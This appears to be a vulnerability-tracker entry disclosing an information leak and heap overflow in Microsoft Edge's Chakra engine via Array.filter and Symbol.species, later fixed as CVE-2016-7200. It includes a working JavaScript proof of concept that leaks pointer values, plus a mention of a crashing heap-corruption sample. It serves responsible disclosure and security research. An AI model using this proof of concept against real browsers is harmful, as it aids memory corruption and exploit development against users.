New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Nov 2016
Cc:



Sign in to add a comment
Microsoft Edge: Info Leak in Array.filter
Project Member Reported by natashenka@google.com, Sep 1 2016 Back to list
There is an info leak in Array.filter. In Chakra, the destination array that arrays are filtered into is initialized using ArraySpeciesCreate, which can create both native and variable arrays. However, the loop that calls the filter function assumes that the destination array is a variable array, and sets each value using DirectSetItemAt, which is unsafe, and can lead to a var pointer being written to an integer array. A PoC is as follows and attached:


var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{

	constructor(){

		return d;
        }
}

class MyArray extends Array {

  static get [Symbol.species]() { 
  return dummy; 
}
}

var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);

function test(i){

	return true;	
}


a.__proto__ = MyArray.prototype;

var o = a.filter(test);
var h = [];

for(item in o){

	var n = new Number(o[item]);
	if (n < 0){
		n = n + 0x100000000;
	}
	h.push(n.toString(16));

}

alert(h);


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
filter.html
709 bytes View Download
Project Member Comment 1 by natashenka@google.com, Sep 1 2016
Labels: -Severity-Moderate Severity-HIgh
I looked a bit more into this issue, and I think it can actually be used to corrupt the heap too. The issue is that DirectSetItemAt is called on an int array when it thinks it's a Var array. But since elements of a Var array are twice as wide as elements of the int array, setting items at indexes larger than half the array length will write outside of the allocated array. I've attached a sample that crashes Edge and demonstrates the overflow.
filter (1).html
799 bytes View Download
Project Member Comment 2 by natashenka@google.com, Sep 8 2016
Labels: MSRC-34910
Project Member Comment 3 by natashenka@google.com, Nov 17 2016
Labels: -Restrict-View-Commit CVE-2016-7200
Fixed in November update
Project Member Comment 4 by natashenka@google.com, Nov 17 2016
Status: Fixed
Sign in to add a comment